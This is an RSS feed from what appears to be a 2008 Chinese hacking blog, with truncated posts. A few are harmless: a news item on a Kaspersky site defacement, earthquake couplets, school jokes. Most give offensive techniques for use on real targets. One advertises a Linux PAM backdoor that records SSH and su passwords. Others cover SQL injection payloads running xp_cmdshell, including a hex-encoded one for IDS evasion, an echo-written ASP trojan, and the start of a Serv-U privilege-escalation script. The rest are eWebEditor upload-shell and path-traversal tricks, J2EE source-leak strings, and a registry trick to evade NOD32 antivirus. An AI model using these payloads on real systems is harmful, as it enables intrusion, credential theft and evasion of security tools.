<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>既然已经失去了进入天堂寻觅幸福的资格..那么就让我沉沦地狱吧!</title><link>http://blog.donews.com/yanhuajianke/</link><description>学习再学习</description><dc:language>zh-CHS</dc:language><generator>.Text Version 1.0.1.0</generator><item><dc:creator>烟花剑客</dc:creator><title>卡巴斯基网站被黑客攻破</title><link>http://blog.donews.com/yanhuajianke/archive/2008/07/23/1323898.aspx</link><pubDate>Wed, 23 Jul 2008 17:56:00 GMT</pubDate><guid>http://blog.donews.com/yanhuajianke/archive/2008/07/23/1323898.aspx</guid><wfw:comment>http://blog.donews.com/yanhuajianke/comments/1323898.aspx</wfw:comment><comments>http://blog.donews.com/yanhuajianke/archive/2008/07/23/1323898.aspx#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://blog.donews.com/yanhuajianke/comments/commentRss/1323898.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=1323898</trackback:ping><description>&lt;p&gt;&amp;nbsp; 牛人无数，sql无处不在啊！&lt;/p&gt;
&lt;p&gt;北京时间7月22日消息，据国外媒体报道，俄罗斯信息安全厂商卡巴斯基实验室的马拉西亚网站周六被黑客攻破，相关的一个网络购物站点也受到影响。&lt;/p&gt;
&lt;p&gt;　　网络安全组织Zone-H记录了这次攻击。 &lt;br /&gt;　　&lt;br /&gt;　　记录显示，攻击者昵称为&amp;ldquo;m0sted&amp;rdquo;，攻击采用了&amp;ldquo;SQL注入&amp;rdquo;的方式。卡巴斯基随后关闭了该网站，该网站采用的是微软的IIS网络服务器。随后该网站不再面向所有用户开放，在接入前要求输入用户名和密码。&lt;/p&gt;
&lt;p&gt;　　Zone-H同时公布了卡巴斯基该网站被攻破之后的截图。卡巴斯基尚未对这一事件发表评论，不过Zone-H表示，由于此次的攻击仅仅是以破坏为目的，因此未来还有可能出现更严重的安全风险。&lt;/p&gt;
&lt;p&gt;　　卡巴斯基在该网站上提供评估版的安全软件下载，因此攻击者有可能以卡巴斯基的名义在该网站上发布恶意软件，这将对用户造成巨大威胁。&lt;/p&gt;&lt;img src ="http://blog.donews.com/yanhuajianke/aggbug/1323898.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>烟花剑客</dc:creator><title>linux pam后门</title><link>http://blog.donews.com/yanhuajianke/archive/2008/06/23/1310928.aspx</link><pubDate>Mon, 23 Jun 2008 21:45:00 GMT</pubDate><guid>http://blog.donews.com/yanhuajianke/archive/2008/06/23/1310928.aspx</guid><wfw:comment>http://blog.donews.com/yanhuajianke/comments/1310928.aspx</wfw:comment><comments>http://blog.donews.com/yanhuajianke/archive/2008/06/23/1310928.aspx#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://blog.donews.com/yanhuajianke/comments/commentRss/1310928.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=1310928</trackback:ping><description>&lt;p&gt;&amp;nbsp; 废话不多说了,直接把动画txt写上,要的联系,货真价实的.联系qq:909473606&lt;/p&gt;
&lt;p&gt;1.安装&lt;br /&gt;编译好后，cp过去文件即可&lt;br /&gt;有的发行版本，会自己做自己的发行版so，所以一般来说，我们都先在自己机器上编译好后门传上去&lt;br /&gt;linux一般来说发行版比较多，所以我们在安装后门之前，最好在本地搭建个类似的环境实验，这样不容易丢鸡&lt;/p&gt;
&lt;p&gt;我现在要安装后门的机器是fc4 具体内核没啥限制 应用层后门就这点好，呵呵&lt;/p&gt;
&lt;p&gt;安装&lt;br /&gt;我已经编译好了&lt;/p&gt;
&lt;p&gt;&lt;br /&gt;安装完毕，那个so穿上去就行了&lt;br /&gt;这是我们的后门&lt;/p&gt;
&lt;p&gt;&lt;br /&gt;注意吧pam_unix.so文件的属性改的和别的so属性一样。我这里本来就是一样的，我就不改了。&lt;/p&gt;
&lt;p&gt;OK，安装完毕&lt;/p&gt;
&lt;p&gt;现在看看他有什么功能&lt;/p&gt;
&lt;p&gt;1.记录密码&lt;br /&gt;这个后门可以记录所有登录sshd的用户密码，以及su的密码，默认，没开启记录功能。开启方法如下&lt;/p&gt;
&lt;p&gt;我们开启&lt;/p&gt;
&lt;p&gt;touch &lt;img src ="http://blog.donews.com/yanhuajianke/aggbug/1310928.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>烟花剑客</dc:creator><title>俩对联(不得不说,中国人最聪明)</title><link>http://blog.donews.com/yanhuajianke/archive/2008/05/23/1294721.aspx</link><pubDate>Fri, 23 May 2008 01:26:00 GMT</pubDate><guid>http://blog.donews.com/yanhuajianke/archive/2008/05/23/1294721.aspx</guid><wfw:comment>http://blog.donews.com/yanhuajianke/comments/1294721.aspx</wfw:comment><comments>http://blog.donews.com/yanhuajianke/archive/2008/05/23/1294721.aspx#Feedback</comments><slash:comments>2</slash:comments><wfw:commentRss>http://blog.donews.com/yanhuajianke/comments/commentRss/1294721.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=1294721</trackback:ping><description>上联 ：八级地震毫无预报&amp;nbsp; 延误几万同胞性命下联 ：六级余震信口开河&amp;nbsp; 折腾千万市民睡觉横批：没搞准过
上联:地震专家不学无术，震前鸦雀无声下联:防震部门急功近利，震后屁话连天横批:震震有词&lt;img src ="http://blog.donews.com/yanhuajianke/aggbug/1294721.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>烟花剑客</dc:creator><title>天才学生</title><link>http://blog.donews.com/yanhuajianke/archive/2008/05/02/1285574.aspx</link><pubDate>Fri, 02 May 2008 21:26:00 GMT</pubDate><guid>http://blog.donews.com/yanhuajianke/archive/2008/05/02/1285574.aspx</guid><wfw:comment>http://blog.donews.com/yanhuajianke/comments/1285574.aspx</wfw:comment><comments>http://blog.donews.com/yanhuajianke/archive/2008/05/02/1285574.aspx#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://blog.donews.com/yanhuajianke/comments/commentRss/1285574.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=1285574</trackback:ping><description>1.某次考试考语文，我的同桌在默词的时候突然灵感来了~前句：问君能有几多愁，要求补后句，他补了句：恰似一道红叉卷上留（原句：恰似一江春水向东流）。老师毫不客气得在卷上打了个X。他还沾沾自喜说：&amp;ldquo;原来我的灵感好灵的！&amp;rdquo;&lt;br /&gt;&lt;br /&gt;2.也是语文考试默词，题目是：玉不琢，不成器。结果我们班一强人答：朋友妻，不客气，第二天家长就被叫到学校了。&lt;br /&gt;&lt;br /&gt;3.又是语文考试，题目：长江后浪推前浪； 某人答：一代更比一代浪。结果自然是家长又见校长。&lt;br /&gt;&lt;br /&gt;4.高中的时候考试有道题是这样的：请写出鲁迅先生的作品《藤野先生》中藤野先生的全名。其答案如下：藤野菜菜子，藤野英二狼， （当时正好有放棒球英豪这个动画片）藤野武大郎，藤野花道，藤野五十六，藤野内丰，藤野隆史等等等等，比较绝的有：藤野小绵羊，气的老师在广播里骂我们无知。&lt;br /&gt;&lt;br /&gt;5.一题曰&amp;ldquo;清水出芙蓉&amp;rdquo;，有人居然答到&amp;ldquo;乱世出英雄&amp;rdquo;，或答&amp;ldquo;山村出美女&amp;rdquo;，或答&amp;ldquo;深海出蛟龙&amp;rdquo;&amp;hel&lt;img src ="http://blog.donews.com/yanhuajianke/aggbug/1285574.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>烟花剑客</dc:creator><title>ASP,PHP与.NET伪造HTTP-REFERER方法及防止伪造REFERER</title><link>http://blog.donews.com/yanhuajianke/archive/2008/04/25/1283214.aspx</link><pubDate>Fri, 25 Apr 2008 17:52:00 GMT</pubDate><guid>http://blog.donews.com/yanhuajianke/archive/2008/04/25/1283214.aspx</guid><wfw:comment>http://blog.donews.com/yanhuajianke/comments/1283214.aspx</wfw:comment><comments>http://blog.donews.com/yanhuajianke/archive/2008/04/25/1283214.aspx#Feedback</comments><slash:comments>4</slash:comments><wfw:commentRss>http://blog.donews.com/yanhuajianke/comments/commentRss/1283214.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=1283214</trackback:ping><description>HTTP-REFERER这个变量已经越来越不可靠了，完全就是可以伪造出来的东东。&lt;br /&gt;&lt;br /&gt;以下是伪造方法：&lt;br /&gt;&lt;br /&gt;ASP/Visual Basic代码&lt;br /&gt;dim http &lt;br /&gt;set http=server.createobject(&amp;quot;MSXML2.XMLHTTP&amp;quot;) '//MSXML2.serverXMLHTTP也可以 &lt;br /&gt;Http.open &amp;quot;GET&amp;quot;,url,false &lt;br /&gt;Http.setRequestHeader &amp;quot;Referer&amp;quot;,&amp;quot;&lt;a href="http://www.dc9.cn/&amp;quot;" target="_blank"&gt;http://www.dc9.cn/&amp;quot;&lt;/a&gt; &lt;br /&gt;Http.send() &lt;br /&gt;&lt;br /&gt;PHP(前提是装了curl):&lt;br /&gt;&lt;br /&gt;PHP代码&lt;br /&gt;$ch = curl_init(); &lt;br /&gt;curl_setopt ($ch, CURLOPT_URL, &amp;quot&lt;img src ="http://blog.donews.com/yanhuajianke/aggbug/1283214.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>烟花剑客</dc:creator><title>Do All in Cmd Shell</title><link>http://blog.donews.com/yanhuajianke/archive/2008/03/16/1263827.aspx</link><pubDate>Sun, 16 Mar 2008 05:23:00 GMT</pubDate><guid>http://blog.donews.com/yanhuajianke/archive/2008/03/16/1263827.aspx</guid><wfw:comment>http://blog.donews.com/yanhuajianke/comments/1263827.aspx</wfw:comment><comments>http://blog.donews.com/yanhuajianke/archive/2008/03/16/1263827.aspx#Feedback</comments><slash:comments>4</slash:comments><wfw:commentRss>http://blog.donews.com/yanhuajianke/comments/commentRss/1263827.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=1263827</trackback:ping><description>Cmd Shell(命令行交互)是黑客永恒的话题，它历史悠久并且长盛不衰。本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;文件传输&lt;br /&gt;对于溢出漏洞获得的cmd shell，最大的问题就是如何上传文件。由于蠕虫病毒流行，连接ipc$所需要的139或445端口被路由封锁。再加上WinXP系统加强了对ipc$的保护，通过ipc$及默认共享上传文件的手段基本无效了。ftp和tftp是两种可行的方法，介于其已被大家熟知，本文就不介绍了。还有三种大家熟悉的办法，作为总结我再提一下：&lt;br /&gt;&lt;br /&gt;1，用Echo命令写ASP木马。&lt;br /&gt;前提当然是目标主机上已经安装了IIS。&lt;br /&gt;一般的ASP木马&amp;quot;体积&amp;quot;较大，不适合直接用echo命令写入文件，这里我提供一个小巧的。&lt;br /&gt;直接给出echo版：&lt;br /&gt;&lt;br /&gt;@echo ^ &amp;gt;up.asp&lt;br /&gt;&lt;br /&gt;注意，只有一行，中间没有回车符。&lt;br /&gt;生成的up.asp不能用浏览器访问，只&lt;img src ="http://blog.donews.com/yanhuajianke/aggbug/1263827.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>烟花剑客</dc:creator><title>J2ee web渗透</title><link>http://blog.donews.com/yanhuajianke/archive/2008/03/16/1263812.aspx</link><pubDate>Sun, 16 Mar 2008 02:15:00 GMT</pubDate><guid>http://blog.donews.com/yanhuajianke/archive/2008/03/16/1263812.aspx</guid><wfw:comment>http://blog.donews.com/yanhuajianke/comments/1263812.aspx</wfw:comment><comments>http://blog.donews.com/yanhuajianke/archive/2008/03/16/1263812.aspx#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://blog.donews.com/yanhuajianke/comments/commentRss/1263812.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=1263812</trackback:ping><description>&lt;p&gt;J2EE的WEB，都有一个WEB-INF的目录，这个目录下有所有的WEB配置文件，数据库配置文件和java二进制文件class文件。有很多站因为配置错误或者是默认配置，导致WEB-INF目录可浏览。通常一些J2EE WEB平台还有些通用的限制绕过漏洞&lt;/p&gt;
&lt;p&gt;/WEB-INF../&amp;nbsp;&amp;nbsp;&amp;nbsp; /WEB-INF..%5C&lt;/p&gt;
&lt;p&gt;J2EE的程序访问是通过配置文件里的路径设定实现的，&amp;quot;/xxx.do&amp;quot;,并不代表目录下有xxx.do这个文件。&lt;/p&gt;
&lt;p&gt;JSP的注射，现在已经有些工具可以实现，手工就没必要介绍了。但jsp有一些通用的源码泄露漏洞（一些流行的JSP WEB平台现在已经没这些漏洞了，低版本的还是有。如果看到是些不常见的JSP服务器，可以试一下）&lt;/p&gt;
&lt;p&gt;.jsP .Jsp .jSp .JSP .jsp%2e .jsp%20 .jsp%80 .jsp%81.....jsp%89&lt;/p&gt;
&lt;p&gt;关于HTTP访问和SSL访问差异，在有些情况下，WWW和SSL对WEB的访问，采取的是不同的配置。比如WEB&lt;img src ="http://blog.donews.com/yanhuajianke/aggbug/1263812.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>烟花剑客</dc:creator><title>好个艳照门</title><link>http://blog.donews.com/yanhuajianke/archive/2008/02/25/1255622.aspx</link><pubDate>Mon, 25 Feb 2008 03:35:00 GMT</pubDate><guid>http://blog.donews.com/yanhuajianke/archive/2008/02/25/1255622.aspx</guid><wfw:comment>http://blog.donews.com/yanhuajianke/comments/1255622.aspx</wfw:comment><comments>http://blog.donews.com/yanhuajianke/archive/2008/02/25/1255622.aspx#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://blog.donews.com/yanhuajianke/comments/commentRss/1255622.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=1255622</trackback:ping><description>&amp;nbsp;忽然发现1个多月前替代就给我几张此照片，我还笑他是ps的，这傻！&lt;img src ="http://blog.donews.com/yanhuajianke/aggbug/1255622.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>烟花剑客</dc:creator><title>躲避IDS</title><link>http://blog.donews.com/yanhuajianke/archive/2008/01/16/1246868.aspx</link><pubDate>Wed, 16 Jan 2008 22:58:00 GMT</pubDate><guid>http://blog.donews.com/yanhuajianke/archive/2008/01/16/1246868.aspx</guid><wfw:comment>http://blog.donews.com/yanhuajianke/comments/1246868.aspx</wfw:comment><comments>http://blog.donews.com/yanhuajianke/archive/2008/01/16/1246868.aspx#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://blog.donews.com/yanhuajianke/comments/commentRss/1246868.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=1246868</trackback:ping><description>1．关于openrowset和opendatasource &lt;br /&gt;&lt;br /&gt;　　可能这个技巧早有人已经会了，就是利用openrowset发送本地命令。通常我们的用法是（包括MSDN的列子）如下： &lt;br /&gt;select * from openrowset('sqloledb','myserver';'sa';'','select * from table') &lt;br /&gt;&lt;br /&gt;　　可见（即使从字面意义上看)openrowset只是作为一个快捷的远程数据库访问，它必须跟在select后面，也就是说需要返回一个recordset 。&lt;br /&gt;&lt;br /&gt;　　那么我们能不能利用它调用xp_cmdshell呢？答案是肯定的！ &lt;br /&gt;select * from openrowset('sqloledb','server';'sa';'','set fmtonly off exec master.dbo.xp_cmdshel l ''dir c:\''') &lt;br /&gt;必须加上set fmtonly off用来屏蔽默认的只返回列信息的设置，这样xp_cmdshell返回的o&lt;img src ="http://blog.donews.com/yanhuajianke/aggbug/1246868.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>烟花剑客</dc:creator><title>SU6.x提权脚本 </title><link>http://blog.donews.com/yanhuajianke/archive/2008/01/15/1246356.aspx</link><pubDate>Tue, 15 Jan 2008 10:03:00 GMT</pubDate><guid>http://blog.donews.com/yanhuajianke/archive/2008/01/15/1246356.aspx</guid><wfw:comment>http://blog.donews.com/yanhuajianke/comments/1246356.aspx</wfw:comment><comments>http://blog.donews.com/yanhuajianke/archive/2008/01/15/1246356.aspx#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://blog.donews.com/yanhuajianke/comments/commentRss/1246356.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=1246356</trackback:ping><description>Serv-U 6.X 提权脚本&lt;br /&gt;使用方法：如果是6.4以下的保持默认即可，只要按你的需要修改执行的命令即可！如果为6.4请在&amp;quot;服务器端口&amp;quot;里填21，然后再在&amp;quot;服务器IP&amp;quot;中填写服务器的真实IP。&lt;br /&gt;复制内容到剪贴板代码:&lt;br /&gt;&amp;lt;%@ LANGUAGE = VBScript %&amp;gt;&lt;br /&gt;&amp;lt;%&lt;br /&gt;Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit&lt;br /&gt;dim action&lt;br /&gt;action=request(&amp;quot;action&amp;quot;)&lt;br /&gt;if not isnumeric(action) then response.end&lt;br /&gt;user = trim(request(&amp;quot;u&amp;quot;))&lt;br /&gt;pass = trim(request(&amp;quot;p&amp;quot;))&lt;br /&gt;port = trim(reque&lt;img src ="http://blog.donews.com/yanhuajianke/aggbug/1246356.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>烟花剑客</dc:creator><title> ewebeditor   </title><link>http://blog.donews.com/yanhuajianke/archive/2008/01/13/1245771.aspx</link><pubDate>Sun, 13 Jan 2008 05:31:00 GMT</pubDate><guid>http://blog.donews.com/yanhuajianke/archive/2008/01/13/1245771.aspx</guid><wfw:comment>http://blog.donews.com/yanhuajianke/comments/1245771.aspx</wfw:comment><comments>http://blog.donews.com/yanhuajianke/archive/2008/01/13/1245771.aspx#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://blog.donews.com/yanhuajianke/comments/commentRss/1245771.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=1245771</trackback:ping><description>打开eWebEditorNet/upload.aspx，选择一个cer文件。&lt;br /&gt;再在IE地址栏里面输入javascript:lbtnUpload.click();回车就得到shell了。查看源码就可以看到上传shell的地址。&lt;img src ="http://blog.donews.com/yanhuajianke/aggbug/1245771.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>烟花剑客</dc:creator><title>SQL盲注攻击技术</title><link>http://blog.donews.com/yanhuajianke/archive/2008/01/10/1244896.aspx</link><pubDate>Thu, 10 Jan 2008 05:11:00 GMT</pubDate><guid>http://blog.donews.com/yanhuajianke/archive/2008/01/10/1244896.aspx</guid><wfw:comment>http://blog.donews.com/yanhuajianke/comments/1244896.aspx</wfw:comment><comments>http://blog.donews.com/yanhuajianke/archive/2008/01/10/1244896.aspx#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://blog.donews.com/yanhuajianke/comments/commentRss/1244896.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=1244896</trackback:ping><description>SQL盲注攻击技术综述&lt;br /&gt;&lt;br /&gt;1 SQL盲注攻击技术综述 Javaphile&lt;br /&gt;SQL盲注攻击技术综述&lt;br /&gt;coolswallow of Javaphile (coolswallow@shaolin.org.cn)&lt;br /&gt;Blind SQL Injection Techniques: A Survey&lt;br /&gt;Abstract: This paper gives a survey of current Blind SQL Injection Techniques. It first introduces the definition&lt;br /&gt;of SQL Injection and its risk, and reviews several solutions proposed to solve the problem and their each&lt;br /&gt;disadvantages. Then, the paper discusses that if detailed error messages are suppressed, how to &lt;img src ="http://blog.donews.com/yanhuajianke/aggbug/1244896.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>烟花剑客</dc:creator><title>ewebeditor遍历路径漏洞</title><link>http://blog.donews.com/yanhuajianke/archive/2008/01/09/1244564.aspx</link><pubDate>Wed, 09 Jan 2008 06:09:00 GMT</pubDate><guid>http://blog.donews.com/yanhuajianke/archive/2008/01/09/1244564.aspx</guid><wfw:comment>http://blog.donews.com/yanhuajianke/comments/1244564.aspx</wfw:comment><comments>http://blog.donews.com/yanhuajianke/archive/2008/01/09/1244564.aspx#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://blog.donews.com/yanhuajianke/comments/commentRss/1244564.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=1244564</trackback:ping><description>ewebeditor/admin_uploadfile.asp?id=14&lt;br /&gt;在id=14后面添加&amp;amp;dir=..&lt;br /&gt;再加 &amp;amp;dir=../..&lt;br /&gt;&amp;amp;dir=http://www.cnblogs.com/../.. 看到整个网站文件了&lt;br /&gt;&lt;img src ="http://blog.donews.com/yanhuajianke/aggbug/1244564.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>烟花剑客</dc:creator><title>饶过IDS检测方法</title><link>http://blog.donews.com/yanhuajianke/archive/2008/01/03/1242730.aspx</link><pubDate>Thu, 03 Jan 2008 06:19:00 GMT</pubDate><guid>http://blog.donews.com/yanhuajianke/archive/2008/01/03/1242730.aspx</guid><wfw:comment>http://blog.donews.com/yanhuajianke/comments/1242730.aspx</wfw:comment><comments>http://blog.donews.com/yanhuajianke/archive/2008/01/03/1242730.aspx#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://blog.donews.com/yanhuajianke/comments/commentRss/1242730.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=1242730</trackback:ping><description>首先我说一下如何检测过滤了什么,其实满简单,用and '关键字'='关键字'来判断&lt;br /&gt;如果and 1=1和and 1=2判断有注射的话&lt;br /&gt;and 'a'='a'和and 'a'='b'应该是一样的返回结果,如果出错,说明过滤了单引号,这是个比较简单的判断方法&lt;br /&gt;在不过滤引号的前提下,我们进行其他关键字的判断.&lt;br /&gt;and 'exec'='exec' 正确&lt;br /&gt;说明没有过滤exec,如果过滤了,返回错误.&lt;br /&gt;其他的判断方法就不说了,这个比较简单有效.&lt;br /&gt;&lt;br /&gt;再说饶过的办法吧.&lt;br /&gt;&lt;br /&gt;1.用16进制来饶过单引号和关键字,这个方法是最普通的&lt;br /&gt;前提是不过滤declare.而且该注射点支持多语句执行&lt;br /&gt;本来不想写了,看看还是写个吧&lt;br /&gt;过程是这样的&lt;br /&gt;xx.asp?id=1;declare @a varchar(8000);select @a=0x6D61737465722E2E78705F636D647368656C6C20276E6574207573657227;exec(@a);--&lt;img src ="http://blog.donews.com/yanhuajianke/aggbug/1242730.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>烟花剑客</dc:creator><title>过NOD内存何须如此麻烦</title><link>http://blog.donews.com/yanhuajianke/archive/2007/11/19/1229175.aspx</link><pubDate>Mon, 19 Nov 2007 02:08:00 GMT</pubDate><guid>http://blog.donews.com/yanhuajianke/archive/2007/11/19/1229175.aspx</guid><wfw:comment>http://blog.donews.com/yanhuajianke/comments/1229175.aspx</wfw:comment><comments>http://blog.donews.com/yanhuajianke/archive/2007/11/19/1229175.aspx#Feedback</comments><slash:comments>2</slash:comments><wfw:commentRss>http://blog.donews.com/yanhuajianke/comments/commentRss/1229175.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=1229175</trackback:ping><description>&lt;p&gt;&amp;nbsp;小雨处抓来的！&lt;/p&gt;
&lt;p&gt;要移动硬盘里面的aio到别处，老是给NOD32杀，郁闷球。&lt;br /&gt;&lt;br /&gt;有没有什么方法能绕过去呢？&lt;br /&gt;&lt;br /&gt;方法当然是有的，关键看你有没有创造力了，嘿嘿。&lt;br /&gt;&lt;br /&gt;nod32查毒之前会先看看文件的后缀是不是可执行文件，像什么exe，com啦之类的，那要是我自己创造一个可执行文件的格式呢？ &lt;br /&gt;&lt;br /&gt;闲话少说，看过程：&lt;br /&gt;&lt;br /&gt;导出注册表里的.exe子项，然后修改.exe，比如我要增加一个.tt的后缀文件，我可以改成如下的样式：&lt;br /&gt;&lt;br /&gt;-------------------------------Cut Here ----------------------------------------------- &lt;br /&gt;&lt;br /&gt;Windows Registry Editor Version 5.00&lt;br /&gt;&lt;br /&gt;[HKEY_CLASSES_ROOT\.tt]&lt;br /&gt;@=&amp;quot;exefile&amp;quot;&lt;br /&gt;&amp;quot;Conte&lt;img src ="http://blog.donews.com/yanhuajianke/aggbug/1229175.aspx" width = "1" height = "1" /&gt;</description></item></channel></rss>